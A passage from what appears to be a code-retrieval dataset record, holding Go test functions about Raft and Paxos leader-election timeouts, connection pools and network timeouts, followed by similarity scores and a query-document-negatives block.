time.Now()\n\tinvoker.EXPECT().Invoke(gomock.Any(), gomock.Any()).DoAndReturn(func(context.Context, protocol.Invocation) protocol.Result {\n\t\tdelta := time.Since(now).Nanoseconds() / int64(time.Second)\n\t\tassert.True(t, delta >= 5)\n\t\twg.Done()\n\t\treturn mockFailedResult\n\t}).Times(10)\n\n\tfor i := 0; i < 10; i++ {\n\t\tresult := clusterInvoker.Invoke(context.Background(), &invocation.RPCInvocation{})\n\t\tassert.Nil(t, result.Error())\n\t\tassert.Nil(t, result.Result())\n\t\tassert.Equal(t, 0, len(result.Attachments()))\n\t}\n\n\twg.Wait()\n\ttime.Sleep(time.Second) // in order to ensure checkRetry have done\n\tassert.Equal(t, int64(10), clusterInvoker.taskList.Len())\n\n\tinvoker.EXPECT().Destroy().Return()\n\tclusterInvoker.Destroy()\n\n\tassert.Equal(t, int64(0), clusterInvoker.taskList.Len())\n}", "func (t *T) DistributeTimeout(d time.Duration) {\n\tbadDur := d / time.Duration(len(t.bads))\n\tfor _, b := range t.bads {\n\t\tb.Dur = badDur\n\t}\n}", "func (suite *HandlerTestSuite) TestHandleTimeoutPacket() {\n\tvar (\n\t\tpacket channeltypes.Packet\n\t\tpacketKey []byte\n\t)\n\n\ttestCases := []struct {\n\t\tname string\n\t\tmalleate func()\n\t\texpPass bool\n\t}{\n\t\t{\"success: ORDERED\", func() {\n\t\t\tclientA, clientB, connA, connB := suite.coordinator.SetupClientConnections(suite.chainA, suite.chainB, clientexported.Tendermint)\n\t\t\tchannelA, channelB := suite.coordinator.CreateChannel(suite.chainA, suite.chainB, connA, connB, channeltypes.ORDERED)\n\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), 1, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, uint64(suite.chainB.GetContext().BlockHeight()), uint64(suite.chainB.GetContext().BlockTime().UnixNano()))\n\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\t// need to update chainA client to prove missing ack\n\t\t\tsuite.coordinator.UpdateClient(suite.chainA, suite.chainB, clientA, clientexported.Tendermint)\n\n\t\t\tpacketKey = host.KeyNextSequenceRecv(packet.GetDestPort(), packet.GetDestChannel())\n\t\t}, true},\n\t\t{\"success: UNORDERED\", func() {\n\t\t\tclientA, clientB, _, _, channelA, channelB := suite.coordinator.Setup(suite.chainA, suite.chainB)\n\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), 1, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, uint64(suite.chainB.GetContext().BlockHeight()), uint64(suite.chainB.GetContext().BlockTime().UnixNano()))\n\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\tsuite.Require().NoError(err)\n\n\t\t\t// need to update chainA client to prove missing ack\n\t\t\tsuite.coordinator.UpdateClient(suite.chainA, suite.chainB, clientA, clientexported.Tendermint)\n\t\t\tpacketKey = host.KeyPacketAcknowledgement(packet.GetDestPort(), packet.GetDestChannel(), packet.GetSequence())\n\t\t}, true},\n\t\t{\"success: UNORDERED timeout out of order packet\", func() {\n\t\t\t// setup uses an UNORDERED channel\n\t\t\tclientA, clientB, _, _, channelA, channelB := suite.coordinator.Setup(suite.chainA, suite.chainB)\n\n\t\t\t// attempts to timeout packet with sequence 10 without timing out packet with sequence 1\n\t\t\tfor i := uint64(1); i < 10; i++ {\n\t\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), i, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, uint64(suite.chainB.GetContext().BlockHeight()), 0)\n\n\t\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\t\tsuite.Require().NoError(err)\n\t\t\t}\n\t\t\t// need to update chainA client to prove missing ack\n\t\t\tsuite.coordinator.UpdateClient(suite.chainA, suite.chainB, clientA, clientexported.Tendermint)\n\t\t\tpacketKey = host.KeyPacketAcknowledgement(packet.GetDestPort(), packet.GetDestChannel(), packet.GetSequence())\n\n\t\t}, true},\n\t\t{\"success: ORDERED timeout out of order packet\", func() {\n\t\t\tclientA, clientB, connA, connB := suite.coordinator.SetupClientConnections(suite.chainA, suite.chainB, clientexported.Tendermint)\n\t\t\tchannelA, channelB := suite.coordinator.CreateChannel(suite.chainA, suite.chainB, connA, connB, channeltypes.ORDERED)\n\n\t\t\t// attempts to timeout packet with sequence 10 without timing out packet with sequence 1\n\t\t\tfor i := uint64(1); i < 10; i++ {\n\t\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), i, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, uint64(suite.chainB.GetContext().BlockHeight()), 0)\n\n\t\t\t\terr := suite.coordinator.SendPacket(suite.chainA, suite.chainB, packet, clientB)\n\t\t\t\tsuite.Require().NoError(err)\n\t\t\t}\n\t\t\t// need to update chainA client to prove missing ack\n\t\t\tsuite.coordinator.UpdateClient(suite.chainA, suite.chainB, clientA, clientexported.Tendermint)\n\t\t\tpacketKey = host.KeyNextSequenceRecv(packet.GetDestPort(), packet.GetDestChannel())\n\n\t\t}, true},\n\t\t{\"channel does not exist\", func() {\n\t\t\t// any non-nil value of packet is valid\n\t\t\tsuite.Require().NotNil(packet)\n\n\t\t\tpacketKey = host.KeyNextSequenceRecv(packet.GetDestPort(), packet.GetDestChannel())\n\t\t}, false},\n\t\t{\"UNORDERED: packet not sent\", func() {\n\t\t\t_, _, _, _, channelA, channelB := suite.coordinator.Setup(suite.chainA, suite.chainB)\n\t\t\tpacket = channeltypes.NewPacket(suite.chainA.GetPacketData(suite.chainB), 1, channelA.PortID, channelA.ID, channelB.PortID, channelB.ID, timeoutHeight, 0)\n\t\t\tpacketKey = host.KeyPacketAcknowledgement(packet.GetDestPort(), packet.GetDestChannel(), packet.GetSequence())\n\t\t}, false},\n\t}\n\n\tfor _, tc := range testCases {\n\t\ttc := tc\n\n\t\tsuite.Run(tc.name, func() {\n\t\t\tsuite.SetupTest() // reset\n\n\t\t\thandler := ibc.NewHandler(*suite.chainA.App.IBCKeeper)\n\n\t\t\ttc.malleate()\n\n\t\t\tproof, proofHeight := suite.chainB.QueryProof(packetKey)\n\n\t\t\tmsg := channeltypes.NewMsgTimeout(packet, 1, proof, proofHeight, suite.chainA.SenderAccount.GetAddress())\n\n\t\t\t_, err := handler(suite.chainA.GetContext(), msg)\n\n\t\t\tif tc.expPass {\n\t\t\t\tsuite.Require().NoError(err)\n\n\t\t\t\t// replay should return an error\n\t\t\t\t_, err := handler(suite.chainA.GetContext(), msg)\n\t\t\t\tsuite.Require().Error(err)\n\n\t\t\t\t// verify packet commitment was deleted\n\t\t\t\thas := suite.chainA.App.IBCKeeper.ChannelKeeper.HasPacketCommitment(suite.chainA.GetContext(), packet.GetDestPort(), packet.GetDestChannel(), packet.GetSequence())\n\t\t\t\tsuite.Require().False(has)\n\n\t\t\t} else {\n\t\t\t\tsuite.Require().Error(err)\n\t\t\t}\n\t\t})\n\t}\n}", "func TestRetryDoInteralFunc(t *testing.T) {\n\texec := func() (error, interface{}){\n\t\tr := number.Random(0, 100000000)\n\t\tfmt.Println(\"r is\", r)\n\t\tif r < 100000000 / 2{\n\t\t\treturn errors.New(\"xx\"), nil\n\t\t}\n\t\treturn nil, map[string]string{\"abc\":\"wocao\"}\n\t}\n\terr, res, count := RetryDoInteralTime(exec, 5, 100)\n\tfmt.Printf(\"TestRetryDoInteralFunc error is %s res is %v count is %d\", err, res, count)\n}", "func (this *PoolTestSuite) TestMaxWaitMultiGoroutineed() {\n\tmaxWait := 500 // wait for connection\n\tholdTime := 2 * maxWait // how long to hold connection\n\tgoroutines := 10 // number of goroutines to grab the object initially\n\tthis.pool.Config.BlockWhenExhausted = true\n\tthis.pool.Config.MaxWaitMillis = int64(maxWait)\n\tthis.pool.Config.MaxTotal = goroutines\n\t// Create enough goroutines so half the goroutines will have to wait\n\tresultChans := make([]chan TestGoroutineResult, goroutines*2)\n\torigin := currentTimeMillis() - 1000\n\tfor i := 0; i < len(resultChans); i++ {\n\t\tresultChans[i] = waitTestGoroutine(this.pool, holdTime)\n\t}\n\tvar failed int = 0\n\tresults := make([]TestGoroutineResult, len(resultChans))\n\tfor i := 0; i < len(resultChans); i++ {\n\t\tch := resultChans[i]\n\t\tresult := <-ch\n\t\tclose(ch)\n\t\tresults[i] = result\n\t\tif result.error != nil {\n\t\t\tfailed++\n\t\t}\n\t}\n\tif debug_test || len(resultChans)/2 != failed {\n\t\tfmt.Println(\n\t\t\t\"MaxWait: \", maxWait,\n\t\t\t\" HoldTime: \", holdTime,\n\t\t\t\" MaxTotal: \", goroutines,\n\t\t\t\" Goroutines: \", len(resultChans),\n\t\t\t\" Failed: \", failed)\n\t\tfor _, result := range results {\n\t\t\tfmt.Println(\n\t\t\t\t\"Preborrow: \", (result.preborrow - origin),\n\t\t\t\t\" Postborrow: \", (result.postborrow - origin),\n\t\t\t\t\" BorrowTime: \", (result.postborrow - result.preborrow),\n\t\t\t\t\" PostReturn: \", (result.postreturn - origin),\n\t\t\t\t\" Ended: \", (result.ended - origin),\n\t\t\t\t\" ObjId: \", result.objectId)\n\t\t}\n\t}\n\tthis.Equal(len(resultChans)/2, failed, \"Expected half the goroutines to fail\")\n}", "func timeoutVerify(progressBarArray *[]*progressReader) {\n\tfor {\n\t\tfor _, ret := range *progressBarArray {\n\t\t\tdiff := time.Since(ret.lastRead)\n\t\t\tif diff > nanosecondsTimeout {\n\t\t\t\t(*(ret.reader)).Close()\n\t\t\t\tret.lastRead = time.Now()\n\t\t\t}\n\t\t}\n\t\ttime.Sleep(time.Second)\n\t}\n}", "func TestChangeConfig_removeVoters(t *testing.T) {\n\t// launch 5 node cluster\n\tc, ldr, flrs := launchCluster(t, 5)\n\tdefer c.shutdown()\n\n\t// wait for commit ready\n\tc.waitCommitReady(ldr)\n\n\telectionAborted0 := c.registerFor(eventElectionAborted, flrs[0])\n\tdefer c.unregister(electionAborted0)\n\telectionAborted1 := c.registerFor(eventElectionAborted, flrs[1])\n\tdefer c.unregister(electionAborted1)\n\n\t// submit ChangeConfig with two voters removed\n\tconfig := c.info(ldr).Configs.Latest\n\tif err := config.SetAction(flrs[0].nid, Remove); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif err := config.SetAction(flrs[1].nid, Remove); err != nil {\n\t\tt.Fatal(err)\n\t}\n\tc.ensure(waitTask(ldr, ChangeConfig(config), c.longTimeout))\n\n\t// wait for stable config\n\tc.ensure(waitTask(ldr, WaitForStableConfig(), c.longTimeout))\n\n\t// ensure that removed nodes aborted election\n\te, err := electionAborted0.waitForEvent(c.longTimeout)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif e.reason != \"not voter\" {\n\t\tc.Fatalf(\"reason=%q, want %q\", e.reason, \"not part of cluster\")\n\t}\n\t_, err = electionAborted1.waitForEvent(c.longTimeout)\n\tif err != nil {\n\t\tt.Fatal(err)\n\t}\n\tif e.reason != \"not voter\" {\n\t\tc.Fatalf(\"reason=%q, want %q\", e.reason, \"not part of cluster\")\n\t}\n\n\t// shutdown the removed nodes\n\tc.shutdown(flrs[0], flrs[1])\n\n\t// shutdown the leader\n\tc.shutdown(ldr)\n\n\t// wait for leader among the remaining two nodes\n\tc.waitForLeader(flrs[2], flrs[3])\n}", "func executeQuestionTestWithTimeout(t *testing.T, test questionTest) {\n\ttimeout := time.After(2 * time.Second)\n\tdone := make(chan bool)\n\n\tgo func() {\n\t\texecuteQuestionTest(t, test)\n\t\tdone <- true\n\t}()\n\n\tselect {\n\tcase <-timeout:\n\t\tt.Fatal(\"Test timed-out\")\n\tcase <-done:\n\t}\n}", "func TestLeaderElectionReceiveMessages(t *testing.T) {\n\tp := newPaxos(&Config{ID: 1, NodeCount: 5})\n\n\tif p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected unset progress timer\")\n\t}\n\tif p.prepare != nil {\n\t\tt.Fatalf(\"expected nil *pb.Prepare\")\n\t}\n\tif exp, a := uint64(0), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d; found %d\", exp, a)\n\t}\n\tassertLeaderElectionState := func(expLastAttempted, expViewChanges int) {\n\t\tassertState(t, p, StateLeaderElection)\n\t\tif exp, a := uint64(expLastAttempted), p.lastAttempted; a != exp {\n\t\t\tt.Fatalf(\"expected last attempted view %d; found %d\", exp, a)\n\t\t}\n\t\tif exp, a := expViewChanges, len(p.viewChanges); a != exp {\n\t\t\tt.Fatalf(\"expected %d ViewChange message, found %d\", exp, a)\n\t\t}\n\t}\n\tassertLeaderElectionState(1, 1)\n\n\t// ViewChange message from node 0 should be applied successfully.\n\tvc := &pb.ViewChange{NodeId: 0, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// Replayed ViewChange message should be ignored. Idempotent.\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from self should be ignored.\n\tvc = &pb.ViewChange{NodeId: 1, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message for past view should be ignored.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 0}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 2)\n\n\t// ViewChange message from node 2 should be applied successfully.\n\t// Leader election should complete, because quorum of 3 nodes achieved.\n\tvc = &pb.ViewChange{NodeId: 2, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n\tif exp, a := uint64(1), p.lastInstalled; a != exp {\n\t\tt.Fatalf(\"expected last installed view %d after leader election; found %d\", exp, a)\n\t}\n\tif !p.progressTimer.isSet() {\n\t\tt.Fatalf(\"expected progress timer to be set after completed leader election\")\n\t}\n\n\t// The rest of the ViewChange messages should be ignored.\n\tvc = &pb.ViewChange{NodeId: 3, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tvc = &pb.ViewChange{NodeId: 4, AttemptedView: 1}\n\tp.onViewChange(vc)\n\tassertLeaderElectionState(1, 3)\n}", "func (c *ClusterClient) randomNode() (*clusterNode, error) {\n\tvar nodeErr error\n\tfor i := 0; i < 10; i++ {\n\t\tc.mu.RLock()\n\t\tclosed := c.closed\n\t\taddrs := c.addrs\n\t\tc.mu.RUnlock()\n\n\t\tif closed {\n\t\t\treturn nil, pool.ErrClosed\n\t\t}\n\n\t\tn := rand.Intn(len(addrs))\n\n\t\tnode, err := c.nodeByAddr(addrs[n])\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\n\t\tnodeErr = node.Client.ClusterInfo().Err()\n\t\tif nodeErr == nil {\n\t\t\treturn node, nil\n\t\t}\n\t}\n\treturn nil, nodeErr\n}", "func TestLearnerCannotVote(t *testing.T) {\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n2)\n\n\tn2.becomeFollower(1, None)\n\n\tn2.Step(pb.Message{From: 1, To: 2, Term: 2, Type: pb.MsgVote, LogTerm: 11, Index: 11})\n\n\tif len(n2.msgs) != 0 {\n\t\tt.Errorf(\"expect learner not to vote, but received %v messages\", n2.msgs)\n\t}\n}", "func (s stdlib) Timeout(time.Duration) {}", "func TestGameRandom(t *testing.T) {\n\tgame := NewGame(0, 1)\n\n\tvar move Movement\n\tfor !game.controller.isGameover {\n\t\tfor i := 0; i < 10; i++ {\n\t\t\tmove = Movement(rand.Intn(int(MOVE_FORCE_DOWN)))\n\t\t\tgame.Tick(move)\n\t\t}\n\n\t\ttet := game.nextTet\n\t\tfor tet == game.nextTet {\n\t\t\tgame.Tick(MOVE_FORCE_DOWN)\n\t\t}\n\t}\n\n\tif game.score < 0 {\n\t\tt.Error(\"Score is negative somehow\")\n\t}\n}", "func (e *ErrWaitServiceStableTimeout) Timeout() bool {\n\treturn true\n}", "func TestIdleConns(t *testing.T) {\n\tr := rand.New(rand.NewSource(time.Now().UnixNano()))\n\tif !hasArg(\"idle\") {\n\t\tt.Skip()\n\t}\n\n\tdoc := func(l int) []byte {\n\t\tb := make([]byte, l)\n\t\tn, err := r.Read(b)\n\t\tif err != nil || n != l {\n\t\t\tt.Fatal(\"failed to generate doc\", err, n, l)\n\t\t}\n\n\t\treturn b\n\t}\n\n\tserver := func(doc []byte) *httptest.Server {\n\t\treturn httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) {\n\t\t\tw.Write(doc)\n\t\t}))\n\t}\n\n\td0 := doc(128)\n\ts0 := server(d0)\n\tdefer s0.Close()\n\n\td1 := doc(256)\n\ts1 := server(d1)\n\tdefer s1.Close()\n\n\tconst (\n\t\tclosePeriod = 100 * time.Millisecond\n\t\tconcurrentRequests = 10\n\t)\n\n\tfor _, ti := range []struct {\n\t\tmsg string\n\t\tidleConns int\n\t\tcloseIdleConns time.Duration\n\t}{{\n\t\t\"negative idle (default), negative close (none)\",\n\t\t-1,\n\t\t-1 * closePeriod,\n\t}, {\n\t\t\"zero idle (default), negative close (none)\",\n\t\t0,\n\t\t-1 * closePeriod,\n\t}, {\n\t\t\"small idle, negative close (none)\",\n\t\t3,\n\t\t-1 * closePeriod,\n\t}, {\n\t\t\"large idle, negative close (none)\",\n\t\t256,\n\t\t-1 * closePeriod,\n\t}, {\n\t\t\"negative idle (default), zero close (default)\",\n\t\t-1,\n\t\t0,\n\t}, {\n\t\t\"zero idle (default), zero close (default)\",\n\t\t0,\n\t\t0,\n\t}, {\n\t\t\"small idle, zero close (default)\",\n\t\t3,\n\t\t0,\n\t}, {\n\t\t\"large idle, zero close (default)\",\n\t\t256,\n\t\t0,\n\t}, {\n\t\t\"negative idle (default), close\",\n\t\t-1,\n\t\tclosePeriod,\n\t}, {\n\t\t\"zero idle (default), close\",\n\t\t0,\n\t\tclosePeriod,\n\t}, {\n\t\t\"small idle, close\",\n\t\t3,\n\t\tclosePeriod,\n\t}, {\n\t\t\"large idle, close\",\n\t\t256,\n\t\tclosePeriod,\n\t}} {\n\t\tp := proxytest.WithParams(nil,\n\t\t\tproxy.Params{\n\t\t\t\tIdleConnectionsPerHost: ti.idleConns,\n\t\t\t\tCloseIdleConnsPeriod: ti.closeIdleConns},\n\t\t\t&eskip.Route{Id: \"s0\", Path: \"/s0\", Backend: s0.URL},\n\t\t\t&eskip.Route{Id: \"s1\", Path: \"/s1\", Backend: s1.URL})\n\t\tdefer p.Close()\n\n\t\trequest := func(path string, doc []byte) {\n\t\t\treq, err := http.NewRequest(\"GET\", p.URL+path, nil)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(ti.msg, \"failed to create request\", err)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\treq.Close = true\n\n\t\t\trsp, err := (&http.Client{}).Do(req)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(ti.msg, \"failed to make request\", err)\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tdefer rsp.Body.Close()\n\t\t\tb, err := io.ReadAll(rsp.Body)\n\t\t\tif err != nil {\n\t\t\t\tt.Fatal(ti.msg, \"failed to read response\", err)\n\t\t\t}\n\n\t\t\tif !bytes.Equal(b, doc) {\n\t\t\t\tt.Fatal(ti.msg, \"failed to read response, invalid content\", len(b), len(doc))\n\t\t\t}\n\t\t}\n\n\t\tstop := make(chan struct{})\n\t\twg := sync.WaitGroup{}\n\n\t\trunRequests := func(path string, doc []byte) {\n\t\t\twg.Add(1)\n\t\t\tdefer wg.Done()\n\n\t\t\tfor {\n\t\t\t\tselect {\n\t\t\t\tcase <-stop:\n\t\t\t\t\treturn\n\t\t\t\tdefault:\n\t\t\t\t\trequest(path, doc)\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\n\t\tfor i := 0; i < concurrentRequests; i++ {\n\t\t\tgo runRequests(\"/s0\", d0)\n\t\t\tgo runRequests(\"/s1\", d1)\n\t\t}\n\n\t\t<-time.After(10 * closePeriod)\n\t\tclose(stop)\n\t\twg.Wait()\n\t}\n}", "func Test_TimeoutKeepAlive(t *testing.T) {\n\tkey := \"Test_Keepalive\"\n\twg := new(sync.WaitGroup)\n\n\tconn1, err := redigo.Dial(\"tcp\", RedisHost)\n\n\tif err != nil {\n\t\tt.Errorf(\"redigo.Dial failure due to '%s'\", err)\n\t\treturn\n\t}\n\n\tconn2, err := redigo.Dial(\"tcp\", RedisHost)\n\n\tif err != nil {\n\t\tt.Errorf(\"redigo.Dial failure due to '%s'\", err)\n\t\treturn\n\t}\n\n\tlock1 := New(conn1, key, 1000, 1000, 0, 5)\n\tstatus, err := lock1.Lock()\n\n\tif err != nil || !status {\n\t\tt.Error(\"unable to lock\")\n\t}\n\n\twg.Add(20)\n\tgo func() {\n\t\tfor i := 0; i < 20; i++ {\n\t\t\terr := lock1.KeepAlive()\n\n\t\t\tif err != nil {\n\t\t\t\tt.Errorf(\"timed out during lock contention due to '%v'\", err)\n\t\t\t}\n\n\t\t\twg.Done()\n\t\t\ttime.Sleep(time.Second / 2)\n\t\t}\n\t}()\n\n\ttime.Sleep(time.Second * 2)\n\n\tlock2 := New(conn2, key, 1000, 1000, 0, 5)\n\tstatus, err = lock2.Lock()\n\n\tif status {\n\t\tt.Error(\"should not have been able to lock\")\n\t}\n\n\twg.Wait()\n\ttime.Sleep(time.Second * 2)\n\n\tstatus, err = lock2.Lock()\n\n\tif err != nil || !status {\n\t\tt.Error(\"should have been able to lock\")\n\t}\n}", "func TestRaft2(t *testing.T) {\n\tack := make(chan bool)\n\n\tleader := raft.GetLeaderId()\n\n\t//Kill some one who is not a leader\n\ts1 := (leader + 1) % 5\n\traft.KillServer(s1)\n\tt.Log(\"Killed \", s1)\n\n\t//Once more\n\ts2 := (s1 + 1) % 5\n\traft.KillServer(s2)\n\tt.Log(\"Killed \", s2)\n\n\t//Kill leader now\n\tleader = raft.KillLeader()\n\n\t//Make sure new leader doesn't get elected\n\ttime.AfterFunc(1*time.Second, func() {\n\t\tleaderId := raft.GetLeaderId()\n\t\tif leaderId != -1 {\n\t\t\tt.Error(\"Leader should not get elected!\")\n\t\t}\n\t\tack <- true\n\t})\n\t<-ack\n\n\t//Resurrect for next test cases\n\traft.ResurrectServer(leader)\n\traft.ResurrectServer(s1)\n\traft.ResurrectServer(s2)\n\n\t//Wait for 1 second for new leader to get elected\n\ttime.AfterFunc(1*time.Second, func() { ack <- true })\n\t<-ack\n}", "func (this *PoolTestSuite) TestNoInstanceOverlap() {\n\tmaxTotal := 5\n\tnumGoroutines := 100\n\tdelay := 1\n\titerations := 1000\n\tthis.pool.Config.MaxTotal = maxTotal\n\tthis.pool.Config.MaxIdle = maxTotal\n\tthis.pool.Config.TestOnBorrow = true\n\tthis.pool.Config.BlockWhenExhausted = true\n\tthis.pool.Config.MaxWaitMillis = int64(-1)\n\trunTestGoroutines(this.T(), numGoroutines, iterations, delay, this.pool)\n\tthis.Equal(0, this.pool.GetDestroyedByBorrowValidationCount())\n}", "func TestRemoveNICWhileHandlingRSTimer(t *testing.T) {\n\tconst (\n\t\tnicID = 1\n\n\t\tmaxRtrSolicitations = 5\n\t)\n\n\te := testLinkEndpoint{}\n\ts := New(Options{\n\t\tNetworkProtocols: []NetworkProtocol{&testIPv6Protocol{}},\n\t\tNDPConfigs: NDPConfigurations{\n\t\t\tMaxRtrSolicitations: maxRtrSolicitations,\n\t\t\tRtrSolicitationInterval: minimumRtrSolicitationInterval,\n\t\t},\n\t})\n\n\tif err := s.CreateNIC(nicID, &e); err != nil {\n\t\tt.Fatalf(\"s.CreateNIC(%d, _) = %s\", nicID, err)\n\t}\n\n\ts.mu.Lock()\n\t// Wait for the router solicitation timer to fire and block trying to obtain\n\t// the stack lock when doing link address resolution.\n\ttime.Sleep(minimumRtrSolicitationInterval * 2)\n\tif err := s.removeNICLocked(nicID); err != nil {\n\t\tt.Fatalf(\"s.removeNICLocked(%d) = %s\", nicID, err)\n\t}\n\ts.mu.Unlock()\n}", "func (s *ProducerSuite) TestTooSmallShutdownTimeout(c *C) {\n\ts.cfg.Producer.ShutdownTimeout = 0\n\tp, _ := Spawn(s.ns, s.cfg)\n\tp.testDroppedMsgCh = s.droppedMsgCh\n\toffsetsBefore := s.kh.GetNewestOffsets(\"test.4\")\n\n\t// When\n\tfor i := 0; i < 100; i++ {\n\t\tv := sarama.StringEncoder(strconv.Itoa(i))\n\t\tp.AsyncProduce(\"test.4\", v, v, nil)\n\t}\n\tp.Stop()\n\toffsetsAfter := s.kh.GetNewestOffsets(\"test.4\")\n\n\t// Then\n\tc.Assert(s.failedMessages(), DeepEquals, []string{})\n\tdelta := int64(0)\n\tfor i := 0; i < 4; i++ {\n\t\tdelta += offsetsAfter[i] - offsetsBefore[i]\n\t}\n\tc.Assert(delta, Equals, int64(100))\n}" ]
[ "0.7392285", "0.7258269", "0.7240653", "0.71084785", "0.70563203", "0.6986426", "0.6932368", "0.6688159", "0.6592933", "0.6393019", "0.5969358", "0.5868286", "0.5805566", "0.5655917", "0.562618", "0.5552523", "0.54569644", "0.5443769", "0.54374623", "0.54012024", "0.53832304", "0.5354393", "0.5241738", "0.523637", "0.52043176", "0.51916605", "0.51687855", "0.51675904", "0.51502854", "0.5136965", "0.5126036", "0.5115688", "0.5064329", "0.5057078", "0.505059", "0.5034515", "0.50131977", "0.50073963", "0.50069517", "0.49902752", "0.49861223", "0.4972194", "0.49703118", "0.49548006", "0.4949777", "0.49414024", "0.4912595", "0.49053305", "0.4890859", "0.48826772", "0.48823753", "0.48624343", "0.484458", "0.4825755", "0.48200348", "0.48191863", "0.48132476", "0.48129368", "0.48116067", "0.48054546", "0.4805231", "0.48050475", "0.4797308", "0.47638318", "0.4762922", "0.47578955", "0.47571507", "0.475613", "0.47455725", "0.4742504", "0.4737078", "0.47339407", "0.47302356", "0.47286624", "0.47166032", "0.47125638", "0.4707229", "0.47040173", "0.4703057", "0.46892375", "0.46892303", "0.46891963", "0.468908", "0.468322", "0.46799672", "0.4673487", "0.46723938", "0.46588424", "0.46558282", "0.4652025", "0.46428213", "0.46411693", "0.46340218", "0.46333504", "0.46300098", "0.4624913", "0.461891", "0.4615078", "0.46142077", "0.4611776" ]
0.84037805
0
testNonleadersElectionTimeoutNonconflict tests that in most cases only a single server(follower or candidate) will time out, which reduces the likelihood of split vote in the new election. Reference: section 5.2
func testNonleadersElectionTimeoutNonconflict(t *testing.T, state StateType) { et := 10 size := 5 rs := make([]*raft, size) ids := idsBySize(size) for k := range rs { rs[k] = newTestRaft(ids[k], ids, et, 1, NewMemoryStorage()) } defer func() { for k := range rs { closeAndFreeRaft(rs[k]) } }() conflicts := 0 for round := 0; round < 1000; round++ { for _, r := range rs { switch state { case StateFollower: r.becomeFollower(r.Term+1, None) case StateCandidate: r.becomeCandidate() } } timeoutNum := 0 for timeoutNum == 0 { for _, r := range rs { r.tick() if len(r.readMessages()) > 0 { timeoutNum++ } } } // several rafts time out at the same tick if timeoutNum > 1 { conflicts++ } } if g := float64(conflicts) / 1000; g > 0.3 { t.Errorf("probability of conflicts = %v, want <= 0.3", g) } }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func TestLearnerElectionTimeout(t *testing.T) {\n\tn1 := newTestLearnerRaft(1, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tn2 := newTestLearnerRaft(2, []uint64{1}, []uint64{2}, 10, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(n1)\n\tdefer closeAndFreeRaft(n2)\n\n\tn1.becomeFollower(1, None)\n\tn2.becomeFollower(1, None)\n\n\t// n2 is learner. Learner should not start election even when times out.\n\tsetRandomizedElectionTimeout(n2, n2.electionTimeout)\n\tfor i := 0; i < n2.electionTimeout; i++ {\n\t\tn2.tick()\n\t}\n\n\tif n2.state != StateFollower {\n\t\tt.Errorf(\"peer 2 state: %s, want %s\", n2.state, StateFollower)\n\t}\n}", "func testNonleaderElectionTimeoutRandomized(t *testing.T, state StateType) {\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\ttimeouts := make(map[int]bool)\n\tfor round := 0; round < 50*et; round++ {\n\t\tswitch state {\n\t\tcase StateFollower:\n\t\t\tr.becomeFollower(r.Term+1, 2)\n\t\tcase StateCandidate:\n\t\t\tr.becomeCandidate()\n\t\t}\n\n\t\ttime := 0\n\t\tfor len(r.readMessages()) == 0 {\n\t\t\tr.tick()\n\t\t\ttime++\n\t\t}\n\t\ttimeouts[time] = true\n\t}\n\n\tfor d := et + 1; d < 2*et; d++ {\n\t\tif !timeouts[d] {\n\t\t\tt.Errorf(\"timeout in %d ticks should happen\", d)\n\t\t}\n\t}\n}", "func getElectionTimeout() time.Duration {\n\treturn time.Duration(rand.Intn(300) + 150)\n}", "func electionTimeout() int64 {\n\treturn int64(rand.Intn(MAXELECTIMEOUT- MINELECTIMEOUT) + MINELECTIMEOUT)\n}", "func (node *Node) randElectionTimeout() time.Duration {\n\treturn time.Duration(150+rand.Intn(150)) * time.Millisecond\n}", "func testNonleaderStartElection(t *testing.T, state StateType) {\n\t// election timeout\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tswitch state {\n\tcase StateFollower:\n\t\tr.becomeFollower(1, 2)\n\tcase StateCandidate:\n\t\tr.becomeCandidate()\n\t}\n\n\tfor i := 1; i < 2*et; i++ {\n\t\tr.tick()\n\t}\n\n\tif r.Term != 2 {\n\t\tt.Errorf(\"term = %d, want 